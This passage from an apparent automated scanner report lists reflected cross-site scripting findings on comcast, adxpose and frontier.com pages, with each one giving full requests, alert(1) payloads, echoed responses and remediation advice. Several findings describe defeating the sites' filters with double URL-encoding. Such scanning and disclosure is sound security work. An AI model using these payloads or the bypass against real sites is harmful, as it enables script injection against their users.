Path:   /m2/comcastresidentialservices/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 819af<script>alert(1)</script>f8868cea7a0 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/comcastresidentialservices/mbox/standard?mboxHost=sitesearch.comcast.com&mboxSession=1315327839174-766376&mboxPage=1315329733349-634146&mboxCount=1&internalkeyword=xss&mbox=Search_Image_Promos819af<script>alert(1)</script>f8868cea7a0&mboxId=0&mboxTime=1315311733394&mboxURL=http%3A%2F%2Fsitesearch.comcast.com%2F%3Fq%3Dxss%26cat%3Dcom%26con%3Dwww%26sec%3D%26PageName%3DLooking%252Bfor%2BProducts%2Band%2BPrices%253F&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: comcastresidentialservices.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 215
Date: Tue, 06 Sep 2011 12:22:52 GMT
Server: Test & Target

mboxFactories.get('default').get('Search_Image_Promos819af<script>alert(1)</script>f8868cea7a0',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315327839174-766376.19");

2.23. http://event.adxpose.com/event.flow [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 18ccf<script>alert(1)</script>aa7f8549978 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D8383746361359954%3F&uid=TVYMYp4lQTRs9JsS_4098672818ccf<script>alert(1)</script>aa7f8549978&xy=0%2C0&wh=300%2C250&vchannel=41471866&cid=3941858&iad=1315331134985-48379358672536910&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/80181/197812/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=77EE7E015EE500AABD3FD55823F0F1DB; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Tue, 06 Sep 2011 12:46:01 GMT

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("TVYMYp4lQTRs9JsS_4098672818ccf<script>alert(1)</script>aa7f8549978");

2.24. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72d0c%2527%253balert%25281%2529%252f%252f8df9650bb55 was submitted in the REST URL parameter 1. This input was echoed as 72d0c';alert(1)//8df9650bb55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering72d0c%2527%253balert%25281%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrdering72d0c';alert(1)//8df9650bb55/CustomAppTabInfo/tabs.css');//]]>
...[SNIP]...

2.25. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 246a3%2527%253balert%25281%2529%252f%252fe03a978b338 was submitted in the REST URL parameter 2. This input was echoed as 246a3';alert(1)//e03a978b338 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering/CustomAppTabInfo246a3%2527%253balert%25281%2529%252f%252fe03a978b338/tabs.css HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrdering/CustomAppTabInfo246a3';alert(1)//e03a978b338/tabs.css');//]]>
...[SNIP]...

2.26. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ac67%2527%253balert%25281%2529%252f%252f9c77ef6d725 was submitted in the REST URL parameter 3. This input was echoed as 1ac67';alert(1)//9c77ef6d725 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering/CustomAppTabInfo/tabs.css1ac67%2527%253balert%25281%2529%252f%252f9c77ef6d725 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrdering/CustomAppTabInfo/tabs.css1ac67';alert(1)//9c77ef6d725');//]]>
...[SNIP]...

2.27. http://frontier.com/AgentOrdering/Login/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/Login/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa607%2527%253balert%25281%2529%252f%252f787cb7d4dcb was submitted in the REST URL parameter 1. This input was echoed as aa607';alert(1)//787cb7d4dcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrderingaa607%2527%253balert%25281%2529%252f%252f787cb7d4dcb/Login/ HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43627


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrderingaa607';alert(1)//787cb7d4dcb/Login/');//]]>
...[SNIP]...

2.28. http://frontier.com/AgentOrdering/Login/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/Login/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44e10%2527%253balert%25281%2529%252f%252f43ea9213a24 was submitted in the REST URL parameter 2. This input was echoed as 44e10';alert(1)//43ea9213a24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering/Login44e10%2527%253balert%25281%2529%252f%252f43ea9213a24/ HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43627


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrdering/Login44e10';alert(1)//43ea9213a24/');//]]>
...[SNIP]...

2.29. http://frontier.com/BillPay/Login.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://frontier.com
Path:   /BillPay/Login.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8990'%3b3ad87ec9c52 was submitted in the REST URL parameter 1. This input was echoed as c8990';3ad87ec9c52 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BillPayc8990'%3b3ad87ec9c52/Login.aspx HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43311


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?aspxerrorpath=/BillPayc8990';3ad87ec9c52/Login.aspx');//]]>
...[SNIP]...

2.30. http://frontier.com/BillPay/Login.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /BillPay/Login.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f062%2527%253balert%25281%2529%252f%252fa328f8cd333 was submitted in the REST URL parameter 2. This input was echoed as 3f062';alert(1)//a328f8cd333 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /BillPay/Login.aspx3f062%2527%253balert%25281%2529%252f%252fa328f8cd333 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43593


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/BillPay/Login.aspx3f062';alert(1)//a328f8cd333');//]]>
...[SNIP]...

2.31. http://frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Controls/SharedWebMethods.aspx/GetCurrentLocale

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2a52%2527%253balert%25281%2529%252f%252f6141da654bb was submitted in the REST URL parameter 2. This input was echoed as b2a52';alert(1)//6141da654bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

POST /Controls/SharedWebMethods.aspxb2a52%2527%253balert%25281%2529%252f%252f6141da654bb/GetCurrentLocale HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
Content-Length: 12
Origin: http://frontier.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/json; charset=UTF-8
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

{'href': ''}

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43807


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Controls/SharedWebMethods.aspxb2a52';alert(1)//6141da654bb/GetCurrentLocale');//]]>
...[SNIP]...

2.32. http://frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56e88'%3b3d6207f3d2f was submitted in the REST URL parameter 1. This input was echoed as 56e88';3d6207f3d2f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Controls56e88'%3b3d6207f3d2f/VirtualCode.ashx?pageid=98&origPath=%2fftr.css%2f HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?aspxerrorpath=/Controls56e88';3d6207f3d2f/VirtualCode.ashx');//]]>
...[SNIP]...

2.33. http://frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73438%2527%253balert%25281%2529%252f%252f0fdd979cf43 was submitted in the REST URL parameter 2. This input was echoed as 73438';alert(1)//0fdd979cf43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Controls/VirtualCode.ashx73438%2527%253balert%25281%2529%252f%252f0fdd979cf43?pageid=98&origPath=%2fftr.css%2f HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43927


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Controls/VirtualCode.ashx73438';alert(1)//0fdd979cf43?pageid=98&origPath=/ftr.css/');//]]>
...[SNIP]...

2.34. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Images/2011promo/bg-grey.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7327a%2527%253balert%25281%2529%252f%252f2dd01931fc3 was submitted in the REST URL parameter 1. This input was echoed as 7327a';alert(1)//2dd01931fc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

